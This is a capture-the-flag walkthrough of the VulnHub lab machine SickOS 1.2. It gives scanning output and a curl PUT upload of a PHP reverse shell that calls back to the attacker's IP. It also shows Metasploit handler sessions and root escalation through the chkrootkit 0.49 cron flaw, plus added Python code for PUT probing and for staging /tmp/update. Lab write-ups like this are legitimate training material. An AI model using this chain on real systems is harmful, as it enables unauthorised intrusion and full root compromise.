SickOS
netdiscover -r 123.123.123.0/24
123.123.123.104 00:0c:29:16:48:56 1 60 VMware, Inc.
nmap -T4 -A -v 123.123.123.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:16:48:56 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8, Linux 4.4
Uptime guess: 0.001 days (since Mon Oct 1 19:55:13 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@KaliLNX:~# dirb http://123.123.123.104/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Oct 1 22:20:20 2018
URL_BASE: http://123.123.123.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://123.123.123.104/ ----
+ http://123.123.123.104/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://123.123.123.104/test/
---- Entering directory: http://123.123.123.104/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Oct 1 22:20:32 2018
DOWNLOADED: 4612 - FOUND: 1
root@KaliLNX:~#
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
root@KaliLNX:/opt/VMs/SickOS1.2# wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
vim php-reverse-shell.php
$ip = '123.123.123.201'; // CHANGE THIS
$port = 443; // CHANGE THIS
mv php-reverse-shell.php php-reverse-shell.txt
root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0# curl --upload-file php-reverse-shell.txt -v --url http://123.123.123.104/test/reverse_shell.php -0 --http1.0
* Trying 123.123.123.104...
* TCP_NODELAY set
* Connected to 123.123.123.104 (123.123.123.104) port 80 (#0)
> PUT /test/reverse_shell.php HTTP/1.0
> Host: 123.123.123.104
> User-Agent: curl/7.56.1
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Mon, 01 Oct 2018 22:27:34 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0#
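Note what just happened: nmap's http-methods script reported only GET/HEAD/POST/OPTIONS on "/", yet a PUT into /test/ answered 201 Created. The script only asks the root, so each directory that enumeration turns up has to be probed on its own. The following is an added example, not part of the original write-up: a per-directory PUT probe in Python. The DemoHandler is a constructed stand-in for the target's lighttpd that accepts PUT only under /test/ (so it runs offline); point probe_put() at a real base URL to use it against a target.

```python
"""Per-directory HTTP PUT probe (added example, not from the original write-up).

The Allow header from OPTIONS is advisory; the only reliable test for a writable
directory is a harmless PUT followed by checking the status code.
"""
import http.server
import os
import tempfile
import threading
import urllib.error
import urllib.request

WRITABLE_PREFIX = "/test/"  # constructed: the one directory the demo server lets you PUT into

# Ignore any proxy from the environment so the demo always talks to 127.0.0.1 directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class DemoHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a misconfigured server: PUT works under /test/, nowhere else."""

    root = None  # set to a temp dir before the server starts

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_OPTIONS(self):
        # Allow does not list PUT even though PUT works: OPTIONS alone proves nothing.
        self.send_response(200)
        self.send_header("Allow", "GET, HEAD, POST, OPTIONS")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PUT(self):
        if not self.path.startswith(WRITABLE_PREFIX):
            self.send_error(405)
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        target = os.path.join(self.root, self.path.lstrip("/"))
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as f:
            f.write(body)
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()


def request(url, method, data=None):
    """One request; returns (status, Allow header). HTTP error responses map to their status."""
    req = urllib.request.Request(url, data=data, method=method)
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, resp.headers.get("Allow", "")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Allow", "")


def probe_put(base_url, directory, name="put_probe.txt"):
    """Report what OPTIONS advertises for `directory` and whether a PUT into it succeeds.

    `directory` must start and end with "/" (e.g. "/" or "/test/"). A 200/201/204 on
    the PUT means the directory is writable, i.e. a web shell can be dropped there the
    way the write-up does. Remove the probe file afterwards so nothing is left behind.
    """
    dir_url = base_url.rstrip("/") + directory
    _, allow = request(dir_url, "OPTIONS")
    status, _ = request(dir_url + name, "PUT", data=b"probe\n")
    return {"directory": directory, "allow": allow, "put_status": status,
            "writable": status in (200, 201, 204)}


def run_demo(directories=("/", "/test/")):
    """Start the constructed server on a free port, probe each directory, stop it."""
    DemoHandler.root = tempfile.mkdtemp()
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        base = "http://127.0.0.1:%d" % server.server_address[1]
        return [probe_put(base, d) for d in directories]
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for result in run_demo():
        print(result)
```

Against the demo server the root reports 405 on PUT while /test/ reports 201, and in both cases the Allow header never mentions PUT, which is exactly the gap the nmap output left. On a real engagement feed it the directory list from dirb and use a probe name you can recognise and delete later.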
* On Kali:
msf > use exploit/multi/handler
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 123.123.123.201:443
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > [*] Command shell session 1 opened (123.123.123.201:443 -> 123.123.123.104:49365) at 2018-10-01 23:46:33 +0700
* Open up a browser and request the uploaded file; the PHP reverse shell then connects back and the handler reports the session shown above:
http://123.123.123.104/test/reverse_shell.php
search chkroot
use exploit/unix/local/chkrootkit
show options
set session 1
set lport 8080
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job 1.
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on 123.123.123.201:8080
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kKK6pZ1c6QSe32JH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "kKK6pZ1c6QSe32JH\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (123.123.123.201:8080 -> 123.123.123.104:51812) at 2018-10-01 23:51:11 +0700
[+] Deleted /tmp/update
msf exploit(chkrootkit) >
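What the module did, in case Metasploit itself is blocked (the theme of this box): chkrootkit 0.49 (the tarball sitting in /root on this machine) has a known flaw, CVE-2014-0476, fixed in 0.50. In its slapper() check the line `file_port=$file_port $i` is parsed by the shell as an assignment prefixed to the command `$i`, and /tmp/update is one of the paths it walks, so an executable file at /tmp/update is run with chkrootkit's privileges. Root's cron runs chkrootkit here, hence "Rooting depends on the crontab" and the wait. The following is an added example, not from the write-up and not Metasploit's code, that reproduces the staging and cleanup steps by hand; tmp_dir is a parameter so the demo never touches the real /tmp, and simulate_cron_run() is a constructed stand-in for the cron job, not chkrootkit itself.

```python
"""Manual stand-in for exploit/unix/local/chkrootkit (added example, not Metasploit's code).

Stage an executable at <tmp_dir>/update, let the (simulated) cron-driven chkrootkit
run it, then remove it, mirroring the module's "Payload written", "Waiting for
chkrootkit to run via cron" and "Deleted /tmp/update" messages.
"""
import os
import subprocess
import tempfile


def is_vulnerable(version):
    """True for chkrootkit releases up to and including 0.49 (0.50 fixed the bug)."""
    major, minor = (int(part) for part in version.split(".")[:2])
    return (major, minor) <= (0, 49)


def stage_payload(tmp_dir, command):
    """Write <tmp_dir>/update with mode 0755 and return its path.

    chkrootkit runs the file with no arguments, so a one-line shell script is enough;
    in the real attack `command` is a reverse-shell one-liner aimed at the listener.
    """
    path = os.path.join(tmp_dir, "update")
    with open(path, "w") as f:
        f.write("#!/bin/sh\n%s\n" % command)
    os.chmod(path, 0o755)
    return path


def simulate_cron_run(tmp_dir):
    """Constructed stand-in for root's cron job: execute <tmp_dir>/update if it is there."""
    update = os.path.join(tmp_dir, "update")
    if not (os.path.isfile(update) and os.access(update, os.X_OK)):
        return False
    subprocess.run([update], check=False, timeout=10)
    return True


def cleanup(path):
    """Remove the staged file once the session is up, like the module's 'Deleted /tmp/update'."""
    try:
        os.remove(path)
        return True
    except FileNotFoundError:
        return False


def run_demo():
    """Stage, 'wait for cron', confirm the file ran, clean up; return what happened."""
    tmp_dir = tempfile.mkdtemp()
    marker = os.path.join(tmp_dir, "who_ran_me")
    # Demo command only: records which user executed the payload. Real use: a reverse shell.
    payload = stage_payload(tmp_dir, "id > '%s'" % marker)
    executed = simulate_cron_run(tmp_dir)
    with open(marker) as f:
        ran_as = f.read().strip()  # reads uid=0(root) when root's cron runs it for real
    return {
        "vulnerable_0_49": is_vulnerable("0.49"),
        "vulnerable_0_50": is_vulnerable("0.50"),
        "executed": executed,
        "ran_as": ran_as,
        "cleaned": cleanup(payload),
    }


if __name__ == "__main__":
    print(run_demo())
```

On the target the manual sequence is just the stage_payload() step (create /tmp/update containing a reverse-shell one-liner, chmod 755 it), a listener on the chosen port, and patience until cron fires; remove /tmp/update afterwards. Before spending that time, read root's crontab or /etc/cron.* entries for the chkrootkit schedule so you know how long the wait will be.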
msf exploit(chkrootkit) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UT... 123.123.123.201:443 -> 123.123.123.104:49365 (123.123.123.104)
2 shell cmd/unix 123.123.123.201:8080 -> 123.123.123.104:51812 (123.123.123.104)
msf exploit(chkrootkit) >
msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...
490848829
lMaCOMyqmSVqZTgrUYjEGZDYkqDyhGwj
true
dmPZMxaMtEYKwWYIpyATixztqbPVBnrA
nFzkcRgjOJmxJNQwYZMkxEtCFYifTxFg
FWEncLXPGatXZjOxRsbXBYoWrhkKFjjF
pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 52
-rw-r--r-- 1 root root 39421 Apr 9 2015 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
-r-------- 1 root root 491 Apr 26 2016 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
drwxr-xr-x 2 john john 4096 Apr 12 2016 chkrootkit-0.49
-rw-r--r-- 1 root root 541 Apr 25 2016 newRule
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Successfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assessment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.